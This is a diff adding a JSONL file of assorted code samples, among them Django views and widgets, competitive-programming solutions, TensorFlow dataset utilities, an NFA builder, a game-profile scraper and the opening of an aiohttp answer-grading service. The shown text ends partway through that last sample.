diff --git "a/786.jsonl" "b/786.jsonl" new file mode 100644--- /dev/null +++ "b/786.jsonl" @@ -0,0 +1,621 @@ +{"seq_id":"563448380","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n #url(r'^curriculum_retrieval', views.curriculum_retrieval, name='curriculum_retrieval'),\n url(r'^$', views.index, name='index'),\n url(r'^initialize', views.initialize, name='initialize'),\n url(r'^retrieve_text', views.retrieve_text, name='retrieve_text'),\n url(r'^wrong_and_return', views.wrong_and_return, name='wrong_and_return'),\n url(r'^translate', views.translate, name='translate'),\n]\n","sub_path":"chatbot/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"519275940","text":"from time import time\nfrom random import random\n\nlimit_secs = 2\nstart_time = time()\n\nD = int(input())\nc = list(map(int, input().split()))\ns = [list(map(int, input().split())) for _ in range(D)]\n\ndef calc_score(t):\n score = 0\n S = 0\n last = [-1] * 26\n for d in range(len(t)):\n S += s[d][t[d]]\n last[t[d]] = d\n for i in range(26):\n S -= c[i] * (d - last[i])\n score += max(10 ** 6 + S, 0)\n return score\n\ndef solution1():\n return [i % 26 for i in range(D)]\n\ndef solution2():\n t = None\n score = -1\n for i in range(26):\n nt = [(i + j) % 26 for j in range(D)]\n if calc_score(nt) > score:\n t = nt\n return t\n\ndef solution3():\n t = []\n for _ in range(D):\n score = -1\n best = -1\n t.append(0)\n for i in range(26):\n t[-1] = i\n new_score = calc_score(t)\n if new_score > score:\n best = i\n score = new_score\n t[-1] = best\n return t\n\ndef optimize0(t):\n return t\n\ndef optimize1(t):\n score = calc_score(t)\n while time() - start_time + 0.15 < limit_secs:\n d = int(random() * D)\n old = t[d]\n t[d] = int(random() * 26)\n new_score = calc_score(t)\n if new_score < score:\n t[d] = old\n else:\n score = new_score\n return t\n\ndef optimize2(t):\n score = calc_score(t)\n while time() - start_time + 0.15 < limit_secs:\n d1 = int(random() * D)\n q1 = int(random() * 26)\n d2 = int(random() * D)\n q2 = int(random() * 26)\n old1 = t[d1]\n old2 = t[d2]\n t[d1] = q1\n t[d2] = q2\n new_score = calc_score(t)\n if new_score < score:\n t[d2] = old2\n t[d1] = old1\n else:\n score = new_score\n return t\n\n\nt = solution3()\nt = optimize2(t)\nprint('\\n'.join(str(e + 1) for e in t))\n","sub_path":"Python_codes/p02618/s387804488.py","file_name":"s387804488.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"579630222","text":"# django imports\nfrom django import forms\nfrom django.forms import MultiWidget\n\n\ndef hourloop():\n empty = []\n for x in range(0, 24):\n x = str(x)\n x = x.zfill(2)\n empty.append((x, x))\n return empty\n\n\ndef minutesloop():\n empty = []\n for x in range(0, 60):\n x = str(x)\n x = x.zfill(2)\n empty.append((x, x))\n return empty\n\nhours = hourloop()\nminutes = minutesloop()\n\n\nclass HourWidget(MultiWidget):\n\n def __init__(self, *args, **kwargs):\n widgets = (\n forms.Select(choices=hours),\n forms.Select(choices=minutes)\n )\n super(HourWidget, self).__init__(widgets, *args, **kwargs)\n\n def decompress(self, value):\n if value:\n return value\n return [None, None]\n\n def value_from_datadict(self, data, files, name):\n time_list = [\n widget.value_from_datadict(data, files, name + '_%s' % i)\n for i, widget in enumerate(self.widgets)]\n\n hour 
= time_list[0]\n minute = time_list[1]\n time = (hour + ':' + minute)\n return str(time)\n\n def format_output(self, rendered_widgets):\n return (rendered_widgets[0] + \":\" + rendered_widgets[1])","sub_path":"events/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"318145874","text":"import math\r\nx=eval(input('请输入小于1000的正整数:'))\r\nassert x<1000\r\ny=0\r\nfor i in range(2,int(math.sqrt(x))+1):\r\n if x%i==0:\r\n print(\"%d\"%i,'*','%d'%(x/i),'=',\\\r\n '%d'%x)\r\n y=1\r\nif y==0:\r\n print('不可因式分解')\r\nkkk=eval(input())","sub_path":"Python代码/因式分解.py","file_name":"因式分解.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"620493630","text":"import time\nimport sys\n\nsys.setrecursionlimit(5000)\n\nlines = open(\"day17.input\", \"r\").read().rstrip().split(\"\\n\")\n\ndef print_grid():\n for line in grid:\n l = \"\"\n for e in line:\n if e == '.':\n l += e\n elif e == '#':\n l += '\\x1b[0;37;41m' + e + '\\x1b[0m'\n elif e == '+':\n l += '\\x1b[0;37;46m' + e + '\\x1b[0m'\n elif e == '~':\n l += '\\x1b[0;37;44m' + e + '\\x1b[0m'\n print(l)\n\nveins = []\nfor line in lines:\n v = {}\n for half in line.split(\", \"):\n coord, rng = half.split(\"=\")\n if '..' in rng:\n c1, c2 = [int(e) for e in rng.split(\"..\")]\n v[coord] = range(c1, c2+1)\n else:\n v[coord] = [int(rng)]\n veins.append(v)\n\nbounds = [500, 500, 0, 0]\n\nfor vein in veins:\n bounds[0] = min(bounds[0], min(vein['x']))\n bounds[1] = max(bounds[1], max(vein['x']))\n bounds[2] = min(bounds[2], min(vein['y']))\n bounds[3] = max(bounds[3], max(vein['y']))\n\nbounds[0] -= 1\nbounds[1] += 1\n\ngrid = [['.' 
for i in range(bounds[0], bounds[1]+1)] for j in range(bounds[2], bounds[3]+1)]\n\nfor vein in veins:\n for y in vein['y']:\n for x in vein['x']:\n grid[y-bounds[2]][x-bounds[0]] = '#'\n\ngrid[0-bounds[2]][500-bounds[0]] = '+'\n\ndef flow_water(pos, spreading):\n try:\n x, y = pos\n gx, gy = x-bounds[0], y-bounds[2]\n grid[gy][gx] = '+'\n #print_grid()\n #print(\"\\n\")\n #time.sleep(.2)\n if y == bounds[3]:\n return True\n if grid[gy+1][gx] == '+':\n return True\n if grid[gy+1][gx] == '.':\n #parent[(x, y+1)] = pos\n if flow_water((x, y+1), False):\n return True\n if grid[gy][gx-1] == '.':\n #parent[(x-1, y)] = pos\n l = flow_water((x-1, y), True)\n else:\n l = False\n if grid[gy][gx+1] == '.':\n #parent[(x+1, y)] = pos\n r = flow_water((x+1, y), True)\n else:\n r = False\n flowing = l or r\n if not flowing and not spreading:\n xx = gx\n while xx >= 0 and grid[gy][xx] == '+':\n grid[gy][xx] = '~'\n xx -= 1\n xx = gx+1\n while xx < len(grid[gy]) and grid[gy][xx] == '+':\n grid[gy][xx] = '~'\n xx += 1\n return flowing\n except Exception as e:\n print(e)\n print_grid()\n exit(0)\n\nflow_water((500, 0), False)\n\nctr = 0\ncount = False\nfor line in grid:\n for e in line:\n if e == '#':\n count = True\n if e in '+~' and count:\n ctr += 1\n\nprint(ctr)\n","sub_path":"day17/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"190313214","text":"import tensorflow as tf\n\n\ndef simple_dataset(training_samples, batch_size, shuffle_buffer=0, cache=True):\n \"\"\"\n prepare a dataset from numpy array without applying a function to it\n Args:\n training_samples: numpy array of training samples, shape: [num_samples,num_vUnits]\n batch_size: size of a mini-batch, int\n shuffle_buffer: number of examples that are shuffled simultaniously, 0 means no shuffeling\n cache: whether to cache the dataset, should be set to False only for large datasets\n Returns:\n dataset: (shuffled) and batched dataset\n \"\"\"\n dataset = tf.data.Dataset.from_tensor_slices(training_samples)\n if shuffle_buffer != 0:\n dataset = dataset.shuffle(buffer_size=shuffle_buffer)\n dataset = dataset.batch(batch_size)\n dataset = dataset.prefetch(buffer_size=1)\n if cache is True:\n dataset = dataset.cache()\n return dataset\n\n\ndef flatten1(x):\n \"\"\"\n flatten tensor x\n -> results in [sample_ch1,sample_ch2,sample_ch3,sample_ch1,sample_ch2,...]\n \"\"\"\n flat = tf.reshape(x, [-1])\n return flat\n\n\ndef flatten2(x):\n \"\"\"\n flatten tensor x, column major\n -> results in [samples_ch1,samples_ch2,samples_ch3]\n \"\"\"\n flat = tf.reshape(tf.transpose(x), [-1])\n return flat\n\n\ndef sliding_window_dataset(training_samples, window_size, batch_size, stride=1, num_cores=4):\n \"\"\"\n prerpare a dataset by slinding an input window over the samples\n Args:\n training_samples: numpy array of training samples, shape: [num_samples,num_channels]\n batch_size: size of a mini-batch, int\n num_cores: number of CPU cores available in the system\n Returns:\n dataset: (shuffled) and batched sliding window dataset\n \"\"\"\n dataset = tf.data.Dataset.from_tensor_slices(training_samples)\n if stride != 0:\n dataset = dataset.apply(tf.contrib.data.sliding_window_batch(window_size, stride=stride))\n else:\n dataset = dataset.batch(window_size)\n dataset = dataset.map(map_func=flatten2, num_parallel_calls=num_cores)\n dataset = dataset.batch(batch_size)\n return dataset\n\n\ndef 
make_one_hot_window_label(sliding_window_sample):\n \"\"\"\n helper function for sliding_window_dataset_labels,\n casts labels to one hot lables and then transforms a window with window_size labels\n into just a single label for the whole window\n \"\"\"\n one_hot_labels = tf.one_hot(sliding_window_sample, depth=5, dtype=tf.int32)\n reshaped = tf.reshape(one_hot_labels, [-1, one_hot_labels.shape[-1]])\n mean = tf.reduce_mean(tf.cast(reshaped, tf.float32), axis=0)\n _, ind = tf.nn.top_k(mean, k=1)\n one_hot_label = tf.scatter_nd([ind], [1], shape=mean.shape)\n return one_hot_label\n\n\ndef sliding_window_dataset_labels(one_hot_labels, window_size, batch_size, stride=1, num_cores=4):\n \"\"\"\n prerpare a dataset by sliding an input window over the labels\n Args:\n one_hot_labels: numpy array of training labels, shape: [num_samples,num_classes]\n batch_size: size of a mini-batch, int\n num_cores: number of CPU cores available in the system\n Returns:\n dataset: (shuffled) and batched sliding window dataset\n \"\"\"\n dataset = tf.data.Dataset.from_tensor_slices(one_hot_labels)\n if stride != 0:\n dataset = dataset.apply(tf.contrib.data.sliding_window_batch(window_size, stride=stride))\n else:\n dataset = dataset.batch(window_size)\n dataset = dataset.map(map_func=make_one_hot_window_label, num_parallel_calls=num_cores)\n dataset = dataset.batch(batch_size)\n return dataset\n\n\ndef _bytes_feature(value):\n \"\"\"\n helper function to convert value into a bytes feature\n \"\"\"\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef write_to_TFRecord(file_name, keys_and_raw_features):\n \"\"\"\n write features to TFRecords file\n Args:\n file_name: name of TFRecords file\n keys_and_raw_features: dictionary, where keys are the names of the features\n and the corresponding values are the features\n \"\"\"\n # open the TFRecords file\n writer = tf.python_io.TFRecordWriter(file_name)\n for i in range(len(keys_and_raw_features[list(keys_and_raw_features.keys())[0]])):\n feature = {}\n for key in keys_and_raw_features.keys():\n value = keys_and_raw_features[key][i].tobytes()\n feature[key] = _bytes_feature(value)\n # Create an example protocol buffer\n example = tf.train.Example(features=tf.train.Features(feature=feature))\n # Serialize to string and write to the file\n writer.write(example.SerializeToString())\n writer.close()\n\n\ndef dataset_from_TFRecords(file_name, batch_size, keys, data_types, shuffle_buffer=0, parallel_reads=1, num_cores=4):\n \"\"\"\n returns features with names specified in keys with types from data_types\n Args:\n file_name: name of TFRecords file, string\n batch_size: size of one mini-batch, int\n keys: keys of the features to load, list of strings\n data_types: list of datatypes corresponding to keys, list of strings ('float32' or 'int32')\n (must be the datatypes which where used when writing the file!!)\n shuffle_buffer: number of examples that are shuffled simultaniously, 0 means no shuffling\n parallel_reads: number of files that are read in parallel, int\n num_cores: number of CPU cores available in the system\n \"\"\"\n\n def parse(serialized):\n \"\"\"\n helper function: convert dataset from TFRecords file\n \"\"\"\n features = {}\n for key in keys:\n features[key] = tf.FixedLenFeature([], tf.string)\n\n # Parse the serialized data so we get a dict with our data.\n parsed_example = tf.parse_single_example(serialized=serialized,\n features=features)\n results = []\n for i in range(len(keys)):\n key = keys[i]\n dtype = data_types[i]\n # Get 
the image as raw bytes.\n raw_feature = parsed_example[key]\n # Decode the raw bytes so it becomes a tensor with type.\n if dtype == 'float32':\n result_feature = tf.decode_raw(raw_feature, tf.float32)\n else:\n result_feature = tf.decode_raw(raw_feature, tf.int32)\n results.append(result_feature)\n return results\n\n dataset = tf.data.TFRecordDataset(file_name, num_parallel_reads=parallel_reads)\n dataset = dataset.map(map_func=parse, num_parallel_calls=num_cores)\n if shuffle_buffer != 0:\n dataset = dataset.shuffle(buffer_size=shuffle_buffer)\n if batch_size > 1:\n dataset = dataset.batch(batch_size)\n return dataset\n\n\ndef make_LSH_values_and_indicies(batch, random_binary_matrix, num_KCs, p_WTA, return_WTA_matrix=False):\n \"\"\"\n return values and indicies of WTA_activation\n Args:\n batch: batch to calculate WTA activations from, shape [batch_size,num_vUnits]\n random_binary_matrix: matrix that connects input to Kenyon cells,\n tensorflow constant, shape [num_vUnits,num_KCs]\n num_KCs: number of Kenyon cells, int\n p_WTA: percentage of KCs that do not get silicend, float\n return_WTA_matrix: whether to calculate the WTA_matrix (for testing purposes), bool\n Returns:\n WTA_values: values of WTA units, shape [batch_size,num_activations]\n WTA_indices_flat: indices of WTA units, shape [batch_size,num_activations]\n \"\"\"\n num_activations = int(p_WTA * num_KCs)\n activation_KCs = tf.matmul(batch, random_binary_matrix)\n WTA_values, WTA_indices_flat = tf.nn.top_k(activation_KCs, k=num_activations)\n if return_WTA_matrix is True:\n batch_size = tf.shape(batch)[0]\n WTA_indices = tf.stack([tf.stack([tf.range(start=0, limit=batch_size) for i in range(num_activations)], axis=1),\n WTA_indices_flat], axis=-1)\n WTA_indices = tf.reshape(WTA_indices, [-1, 2])\n WTA_values_flat = flatten1(WTA_values)\n activation_WTAs = tf.scatter_nd(WTA_indices, WTA_values_flat, shape=[batch_size, num_KCs])\n return activation_WTAs, WTA_values, WTA_indices_flat\n else:\n return WTA_values, WTA_indices_flat\n\n\ndef WTA_activations_from_values_and_indices(values, indices, num_KCs, p_WTA):\n \"\"\"\n get WTA matrix from values and indicies\n Args:\n values: values of WTA units, shape [batch_size,num_activations]\n indices: indices of WTA units, shape [batch_size,num_activations]\n num_KCs: number of Kenyon cells, int\n p_WTA: percentage of WTA cells, float\n Returns:\n WTA_rec: reconstructed matrix, shape [batch_size,num_KCs]\n \"\"\"\n num_activations = int(p_WTA * num_KCs)\n batch_size = tf.shape(values)[0]\n indices = tf.stack([tf.stack([tf.range(start=0, limit=batch_size) for i in range(num_activations)], axis=1),\n indices], axis=-1)\n values = flatten1(values)\n indices = tf.reshape(indices, [-1, 2])\n WTA_rec = tf.scatter_nd(indices, values, shape=[batch_size, num_KCs])\n return WTA_rec\n\n\ndef WTA_activations_from_values_and_indices_map_fn(values, indices, labels):\n \"\"\"\n same as WTA_activations_from_values_and_indices but for a dataset\n \"\"\"\n num_KCs = 16 * 3 * 256\n p_WTA = 0.05\n\n num_activations = int(p_WTA * num_KCs)\n batch_size = tf.shape(values)[0]\n indices = tf.stack([tf.stack([tf.range(start=0, limit=batch_size) for i in range(num_activations)], axis=1),\n indices], axis=-1)\n values = flatten1(values)\n indices = tf.reshape(indices, [-1, 2])\n WTA_rec = tf.scatter_nd(indices, values, shape=[batch_size, num_KCs])\n return WTA_rec, 
labels\n","sub_path":"train/make_datasets.py","file_name":"make_datasets.py","file_ext":"py","file_size_in_byte":9763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"364240369","text":"from .NodeGenerator import NodeGenerator\nfrom .node import *\nimport queue\nimport copy\n# this class represents a single NFA that has a start node and maybe 0 or more accept (finish) nodes\n\nclass Graph:\n\n def __init__(self , char, start = None, finish = None):\n # constructor makes a simple start node and accept state connected by an edge\n node_generator = NodeGenerator.getInstance()\n if(start == None):\n self.start_node = node_generator.make_node(isStart = True)\n self.accept_state = node_generator.make_node(isFinish = True)\n self.start_node.add_destination_node(char, self.accept_state)\n self.all_accept_states=[]\n\n else: # make custom non-simple graphs (like ones after operations)\n self.start_node = start\n self.accept_state = finish\n self.start_node.add_destination_node(char, self.accept_state)\n self.all_accept_states = []\n\n def get_start(self):\n return self.start_node\n\n def get_all_accept(self):\n return self.all_accept_states\n\n def get_accept(self):\n return self.accept_state\n\n # needs modification\n def bfs(self): # returns list of finishes (accept states)\n q = queue.Queue()\n q.put(self.start_node)\n finishes = []\n print(\"bfs starts\\n\")\n while not q.empty():\n top = q.get()\n if top.isFinish:\n finishes.append(top)\n for i in top.edges:\n q.put(i[0])\n print(i[1])\n return finishes\n\n def go(self,cur,s,visited = []):\n\n # print(s,cur.names,cur.id)\n if visited.count(cur.id):\n return\n\n if cur.isFinish:\n print(s , cur.names,cur.id)\n return\n\n visited.append(cur.id)\n\n\n for i in cur.edges:\n z = s\n # z.append([i[1],[i for i in i[0].names],cur.id])\n z.append([cur.id,i[1],i[0].id])\n self.go(i[0],z)\n z.pop()\n\n visited.pop()\n\n def dfs(self): # displaying all patterns in nfa\n print(\"dfs starts\\n\")\n self.go(self.start_node,[])\n\n @staticmethod\n def mergeOr(graphs):\n g = Graph(\"@\")\n g.start_node.clearEdges()\n for i in graphs:\n g.start_node.add_destination_node(\"@\",i.start_node)\n i.start_node.isStart = 0\n i.accept_state.add_destination_node(\"@\",g.accept_state)\n i.accept_state.isFinish = 0\n for j in i.start_node.names:\n g.start_node.names.add(j)\n g.accept_state.names.add(j)\n return g\n\n @staticmethod\n def mergeConcatenate(graphs):\n a = graphs[0]\n b = graphs[1]\n a.accept_state.add_destination_node(\"@\",b.start_node)\n a.accept_state.isFinish = 0\n a.accept_state = b.accept_state\n return a\n\n @staticmethod\n def gClone(graph):\n return copy.deepcopy(graph)\n\n @staticmethod\n def dgClone(dic_graphs):\n dic_g ={}\n for key, value in dic_graphs.items():\n dic_g[key]= Graph.gClone(value)\n return dic_g\n @staticmethod\n def keenClosure(graph):\n \"\"\"\n uses the kleen closure operator on a graph to produce a new graph using thompson algorithm\n :param graph: a graph\n :return:\n \"\"\"\n new_graph = Graph(\"@\")\n graph = Graph.gClone(graph)\n # add new start\n new_graph.start_node.add_destination_node(\"@\", graph.start_node)\n graph.start_node.isStart = False\n # add new finish with edge epsilon\n graph.accept_state.add_destination_node(\"@\", new_graph.accept_state)\n graph.accept_state.isFinish = False\n # repeat more than once\n graph.accept_state.add_destination_node(\"@\", graph.start_node)\n\n return new_graph\n\n @staticmethod\n def keenClosurePlus(graph):\n \"\"\"\n uses 
the positive closure operator on a graph to produce a new graph using thompson algorithm\n :param graph: a graph\n :return:\n \"\"\"\n new_graph = Graph(\"@\")\n new_graph.start_node.clearEdges()\n graph = Graph.gClone(graph)\n # add new start\n new_graph.start_node.add_destination_node(\"@\", graph.start_node)\n graph.start_node.isStart = False\n # add new finish with edge epsilon\n graph.accept_state.add_destination_node(\"@\", new_graph.accept_state)\n graph.accept_state.isFinish = False\n # repeat more than once\n graph.accept_state.add_destination_node(\"@\", graph.start_node)\n\n return new_graph\n\n# if __name__ == '__main__':\n# # just messin around\n# a = Node(1)\n# c = Node(1)\n# b = Node(1)\n# d = Node(1)\n# a.add_edge(c,\"hamada\")\n# a.add_edge(d,\"adel\")\n# c.add_edge(b,\"rewesh\")\n# d.add_edge(b,\"not rewesh\")\n# g = Graph(a,[b])\n# g.bfs()\n# g.dfs()\n#\n","sub_path":"tokenizer/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":4918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"2405140","text":"import scrapy\nimport json\nimport re\nimport io\nimport json\nfrom natsort import natsorted, ns\nimport statistics \n\nclass CharSpider(scrapy.Spider):\n name = \"chars\"\n\n start_urls = []\n\n baseurl = 'https://new.margonem.pl/profile/view,'\n\n json_file = open('./tutorial/general_stats/id_list_total.json')\n json_str = json_file.read()\n json_data = json.loads(json_str)\n\n # for i in json_data:\n # start_urls.append(baseurl+str(i))\n\n for i in reversed(json_data):\n if i > 9000000:\n start_urls.append(baseurl+str(i))\n\n\n # for i in range(1498500,1499523):\n # start_urls.append(baseurl+str(i))\n\n def parse(self, response):\n is_public_checker = response.xpath('.//div[@class=\"character-list\"]/h3/text()').get()\n is_public_checker = is_public_checker.strip()\n\n if is_public_checker != \"Światy publiczne\":\n return\n\n chars = response.xpath('.//div[@class=\"character-list\"][1]//ul/*')\n name = response.xpath('//h2/span/text()').get()\n name = name.lstrip()\n name = name.rstrip()\n\n days = response.xpath('.//div[@class=\"profile-header-data\"][6]//div[@class=\"value\"]/text()').get()\n days = days.replace(' ', '')\n days = int(days)\n\n posts = response.xpath('.//div[@class=\"profile-header-data\"][1]//div[@class=\"value\"]/text()').get()\n posts = posts.replace(' ', '')\n posts = int(posts)\n\n page = response.url.split(\",\")[-1]\n\n # char includes profession, while lvl does not\n char_list = [] \n lvl_list = []\n\n for char in chars:\n lvl = char.xpath('@data-lvl').get()\n prof = char.xpath('input[@class=\"chprof\"]/@value').get()\n char_list.append(lvl + prof)\n lvl_list.append(int(lvl))\n\n #natsorted(char_list, key=lambda y: y.lower())\n char_list.sort(key = lambda y: int(y[0:-1]), reverse = True)\n \n total = 0\n multiplier = 1.85\n increment = 0.2\n reduce_increment = 0.04\n for char in char_list:\n lvl = char[0:-1]\n if int(lvl) > 20:\n total += (int(lvl)-20)**multiplier\n multiplier += increment\n increment -= reduce_increment\n if increment < 0:\n increment = 0\n\n total = total/(days+3.5)\n\n if posts > 0:\n total *= 0.75\n\n\n lvl_list = list(filter(lambda x: x > 10, lvl_list))\n variance = \"null\"\n if len(lvl_list) > 1:\n variance = statistics.variance(lvl_list)\n variance += 1.7\n variance = variance*(20+days**1.05)/20\n variance = round(variance,2)\n \n \n if total > 300 or variance < 10:\n yield{\n 'id': int(page),\n 'name': name,\n 'days': days,\n 'char_list': 
char_list,\n 'total': round(total,2),\n 'variance': variance\n }\n","sub_path":"tutorial/spiders/char_scraper.py","file_name":"char_scraper.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"513465445","text":"'''\nThe count-and-say sequence is the sequence of integers with the first five terms as following:\n\n1. 1\n2. 11\n3. 21\n4. 1211\n5. 111221\n1 is read off as \"one 1\" or 11.\n11 is read off as \"two 1s\" or 21.\n21 is read off as \"one 2, then one 1\" or 1211.\nGiven an integer n, generate the nth term of the count-and-say sequence.\n\nNote: Each term of the sequence of integers will be represented as a string.\n\nExample 1:\nInput: 1\nOutput: \"1\"\n\nExample 2:\nInput: 4\nOutput: \"1211\"\n'''\n# 2018-6-20\n# Count and Say\n# it can also use loop to resolve\nclass Solution:\n def countAndSay(self, n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n return self.subHandle(1,n,'1')\n\n def subHandle(self,s,n,r):\n if s >= n:\n return r\n i = 0\n r += '#'\n tmp = ''\n c = 1\n while i < len(r) - 1:\n if r[i] == r[i+1]:\n c += 1\n else:\n tmp += str(c) + r[i]\n c = 1\n i += 1\n # print(s,n,r,tmp)\n r = tmp\n return self.subHandle(s+1,n,r)\n\nn = 20\ntest = Solution()\nres = test.countAndSay(n)\nprint(res)\n","sub_path":"LeetCode/python/38_easy_Count and Say.py","file_name":"38_easy_Count and Say.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"124652386","text":"#!/usr/bin/env python3\n\nfrom typing import Any, Optional, Iterator, Tuple, Union, Dict, List, TypeVar\nfrom aiohttp import web\nfrom glob import glob\nimport asyncio\nimport enum\nimport signal\nimport multidict\nimport time\nimport sys\nimport os.path\nimport testenv\nimport traceback\nimport socket\nimport textwrap\nimport aiohttp_mako # type: ignore\nimport yaml\nimport re\nimport html\n\nimport config\nimport cgroup\nimport functor\nimport admin\n\n\nta = TypeVar(\"ta\")\nQSET_RE = re.compile(r\"/el/(?P[^/]*)/(?P[^/]*)/(?P[^/]*)/odp/tb/(?P.*[.]qdefx)\") # noqa: E501\n\n\nclass PostOrGet:\n \"\"\"\n A wrapper for accessing either POST or GET (query) arguments in an uniform\n way. 
Please do not use the constructor, use coroutine 'create'.\n Prefers POST.\n \"\"\"\n\n def __init__(self):\n \"\"\"Creates an empty PostOrGet, do not use directly, use 'create'\"\"\"\n self.post : Optional[multidict.MultiDictProxy] = None\n self.query : Optional[multidict.MultiDictProxy] = None\n\n @staticmethod\n async def create(request : web.Request):\n self = PostOrGet()\n self.post = await request.post()\n self.query = request.query\n return self\n\n def get(self, key : str, default : str = None) -> str:\n \"\"\"\n Gets value for given key, prefering post parameters and falling back to\n query if needed.\n \"\"\"\n assert self.post is not None\n assert self.query is not None\n try:\n v = self.post[key]\n assert isinstance(v, str)\n return v\n except KeyError:\n return self.query.get(key, default)\n\n def items(self) -> Iterator[Tuple[str, Any]]:\n \"\"\"Iterates over all post and query parameters\"\"\"\n assert self.post is not None\n assert self.query is not None\n yield from self.post.items()\n yield from self.query.items()\n\n\nclass InvalidInput(Exception):\n pass\n\n\nclass MissingField(InvalidInput):\n def __init__(self, name, key):\n InvalidInput.__init__(self, f\"Evaluator error: \"\n f\"Missing mandatory parameter `{key}' ({name})\")\n\n\nclass InterfaceMode (enum.Flag):\n Null = 0\n IS = enum.auto()\n Priviledged = enum.auto()\n\n\nclass EvalTask:\n @staticmethod\n def parse_qid(qid : str) -> Tuple[Optional[str], Optional[str]]:\n if qid is None:\n return (None, None)\n s = qid.split(\"?\", 1)\n if len(s) == 1:\n return (s[0], None)\n return (s[0] or None, s[1])\n\n def __init__(self, data : PostOrGet, mode : InterfaceMode):\n def ifis(a : ta, b : Optional[ta] = None) -> ta:\n if InterfaceMode.IS in mode or b is None:\n return a\n return b\n\n def getMandatory(a : str, b : Optional[str] = None,\n info : Optional[str] = None) -> str:\n key = ifis(a, b)\n v = data.get(key)\n if v is None:\n raise MissingField(info or b, key)\n return v\n\n self.course_id = getMandatory(\"kod\", \"course_id\", \"course ID\").lower()\n self.question_id, self.option = EvalTask.parse_qid(getMandatory(\"id\"))\n self.answer = getMandatory(\"odp\", \"answer\")\n self.student_id = ifis(functor.mapO(functor.readInt, data.get(\"uco\")),\n None)\n self.view_only = ifis(data.get(\"zobrazeni\") == \"p\", False)\n self.qset = None\n\n if InterfaceMode.IS in mode:\n self.qset = os.path.normpath(data.get(\"sada\", \"NO_QSET_GIVEN\"))\n qset_match = QSET_RE.fullmatch(self.qset)\n if qset_match:\n self.course_id = qset_match.group('course').lower()\n elif InterfaceMode.Priviledged in mode:\n raise InvalidInput(\n f\"Questionare `{self.qset}' is not authorized\")\n\n if self.question_id is None and self.option is None:\n raise MissingField(\"question ID\", \"id\")\n\n\nasync def handle_evaluation(conf : config.Config, slots : cgroup.SlotManager,\n data : PostOrGet, mode : InterfaceMode)\\\n -> Tuple[bool, str, List[testenv.PointEntry]]:\n try:\n task = EvalTask(data, mode)\n\n course = conf.courses.get(task.course_id)\n if course is None:\n raise InvalidInput(f\"Course {task.course_id} not defined\")\n if InterfaceMode.Priviledged not in mode and not course.hint:\n raise InvalidInput(\n \"This course does not allow unathorized (hint) access\")\n\n question : Optional[str] = None\n if task.question_id is not None:\n if os.path.isabs(task.question_id) or task.question_id[0:1] == '.':\n raise InvalidInput(f\"Invalid question ID {task.question_id}\")\n qglobs = glob(os.path.join(course.qdir, 
f\"{task.question_id}.q*\"))\n question_candidates = list(filter(os.path.isfile, qglobs))\n\n if len(question_candidates) == 0:\n raise InvalidInput(\"No questions found for ID \"\n f\"{task.question_id}\", qglobs)\n if len(question_candidates) > 1:\n raise InvalidInput(\"Too many questions found for ID \"\n f\"{task.question_id} \"\n f\"({question_candidates})\")\n question = question_candidates[0]\n\n async with testenv.TestEnvironment(question, task.answer,\n course, slots) as env:\n run_res = await env.run(task.option,\n hint=InterfaceMode.Priviledged not in mode)\n\n log = 80 * \"=\"\n log += textwrap.dedent(f\"\"\"\n date: {time.asctime()}\n course_id: {task.course_id}\n question_id: {task.question_id}\n option: {task.option}\n qdir: {course.qdir}\n question: {question}\n student_id: {task.student_id}\n qset: {task.qset}\n view_only: {task.view_only}\n interface_mode: {mode}\n answer: |\n \"\"\")\n log += textwrap.indent(task.answer, \" \")\n log += \"\\nlog: |\\n\"\n log += textwrap.indent(run_res.stderr, \" \")\n log += \"\\n\"\n log += yaml.safe_dump({\"points\":\n [p.__dict__ for p in run_res.points]})\n log += f\"\\nresult: {run_res.result}\\nreply: |\\n\"\n log += textwrap.indent(run_res.stdout, \" \")\n print(log, file=sys.stderr, flush=True)\n\n output = run_res.stdout\n if InterfaceMode.IS in mode and course.escape_is:\n output = \"
<pre>\n" \n                         f"{html.escape(output, quote=True)}</pre>
\"\n\n return (run_res.result, output, run_res.points)\n\n except InvalidInput as ex:\n print(f\"ERROR: {ex}\", file=sys.stderr)\n return (False, str(ex), [])\n except Exception as ex:\n traceback.print_exc()\n return (False, f\"Error while evaluating: {ex}\", [])\n\n\ndef get_eval_handler(eval_sem : asyncio.BoundedSemaphore, conf : config.Config,\n slots : cgroup.SlotManager, mode : InterfaceMode):\n headers : Dict[str, str] = {}\n if InterfaceMode.Priviledged not in mode and conf.hint_origin is not None:\n headers[\"Access-Control-Allow-Methods\"] = \"POST\"\n headers[\"Access-Control-Allow-Origin\"] = conf.hint_origin\n\n async def handle_eval(request : web.Request) -> web.Response:\n async with eval_sem:\n start = time.perf_counter()\n data = await PostOrGet.create(request)\n (result, comment, points) = await handle_evaluation(conf, slots,\n data, mode)\n end = time.perf_counter()\n print(f\"Handled in {end - start}\", file=sys.stderr, flush=True)\n\n if InterfaceMode.IS not in mode:\n dpoints = [p.__dict__ for p in points]\n return web.json_response({\"result\": result,\n \"comment\": comment,\n \"points\": dpoints},\n 